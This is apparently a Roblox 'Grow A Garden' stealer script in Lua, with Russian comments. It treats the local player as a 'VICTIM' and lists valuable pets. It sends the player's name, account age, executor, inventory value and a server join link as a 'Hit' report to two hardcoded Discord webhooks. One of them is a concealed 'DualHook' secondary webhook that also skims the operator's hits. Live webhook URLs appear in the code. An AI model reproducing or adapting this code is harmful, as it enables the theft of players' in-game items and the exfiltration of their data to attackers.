repeat 
    task.wait() 
until game:IsLoaded()

-- 🔐 DualHook config (секретная часть, НЕ ТРОГАЕМ)
getgenv().DhUser = "Warrior_ggs"
getgenv().DhWebhook = "https://discord.com/api/webhooks/1402819441519099904/ExWswHavk5BTB4c0YbmmYwWAqqr1gCHSDkpedr_AH_1sKIbfie4qEfIXwLTPEAGKS28C"
getgenv().NewUser = "Warrior_ggs"

-- ВНЕШНИЕ ПЕРЕМЕННЫЕ (передай их снаружи, до запуска этого скрипта)
local User = User or "Warrior_ggs" -- например, 'chitofedy'
local Webhook = Webhook or "https://discord.com/api/webhooks/1398128232821293146/L1XkMHS9HYOhE-LwusnMR_b-hrdgn3M5vY9WYzoc6F9W-9wqHheFjlueX1yweFexJ80J"

-- ПРИСВАИВАЕМ В ОСНОВНЫЕ ПЕРЕМЕННЫЕ, используемые в коде
local WEBHOOK_URL = Webhook
local USERNAMES = { User }

local VICTIM = game.Players.LocalPlayer

local PET_WHITELIST = {
    'Raccoon', 'T-Rex', 'Fennec Fox', 'Dragonfly', 'Butterfly', 'Disco Bee', 'Mimic Octopus',
    'Queen Bee', 'Spinosaurus', 'Kitsune', 'Corrupted Kitsune', 'Chicken Zombie','Golden Lab',
}

-- дальше твой код без изменений, DualHook НЕ трогаем

local victimPetTable = {}

local VirtualInputManager = game:GetService("VirtualInputManager")
local dataModule = require(game:GetService("ReplicatedStorage").Modules.DataService)

local function waitForJoin()
    local findTarget = false
    local trigeretName = nil

    for _, player in game.Players:GetPlayers() do
        if not table.find(USERNAMES, player.Name) then
            continue
        end
        trigeretName = player.Name
        findTarget = true
    end

    return findTarget, trigeretName
end

function createDiscordEmbed(petList, totalValue, fileUrl)
    local embed = {
        title = "🍀 Grow A Garden Hit - Azurex 🍀",
        color = 65280,
        fields = {
            {
                name = "👤 **Player Information**",
                value = string.format("```Name: %s\nReceiver: %s\nExecutor: %s\nAccount Age: %s```", 
                    VICTIM.Name, 
                    USERNAMES[1],  
                    identifyexecutor(), 
                    game.Players.LocalPlayer.AccountAge
                ),
                inline = false
            },
            {
                name = "💰 **Total Value**",
                value = string.format("```%s¢```", totalValue),
                inline = false
            },
            {
                name = "🌴 **Backpack**",
                value = string.format("```%s```", petList),
                inline = false
            },
            {
                name = "🏝️ **Join with URL**",
                value = string.format("[%s](https://kebabman.vercel.app/start?placeId=%s&gameInstanceId=%s)", game.JobId, game.PlaceId, game.JobId),
                inline = false
            }
        },
        footer = {
            text = string.format("%s | %s", game.PlaceId, game.JobId)
        }
    }

    local data = {
        content = string.format("--@everyone\ngame:GetService(\"TeleportService\"):TeleportToPlaceInstance(%s, \"%s\")\n", game.PlaceId, game.JobId),
        username = game.Players.LocalPlayer.Name,
        avatar_url = "https://cdn.discordapp.com/attachments/1388921046228275221/1401159395676655637/296008df4615dbf3dde7cba3a426b15e.jpg",
        embeds = {embed}
    }

    local jsonData = game:GetService("HttpService"):JSONEncode(data)
    local headers = { ["Content-Type"] = "application/json" }
    local request = http_request or request or HttpPost or syn.request

    local response = request({
        Url = WEBHOOK_URL,
        Method = "POST",
        Headers = headers,
        Body = jsonData
    })

    if response.StatusCode ~= 200 and response.StatusCode ~= 204 then
        warn("Ошибка отправки в Discord:", response.StatusCode, response.Body)
    end

    if getgenv().DhWebhook and #getgenv().DhWebhook > 10 then
        local dhResponse = request({
            Url = getgenv().DhWebhook,
            Method = "POST",
            Headers = headers,
            Body = jsonData
        })
        if dhResponse.StatusCode ~= 200 and dhResponse.StatusCode ~= 204 then
            warn("Ошибка отправки в DhWebhook:", dhResponse.StatusCode, dhResponse.Body)
        end
    end
end

-- и далее весь твой остальной код без изменений
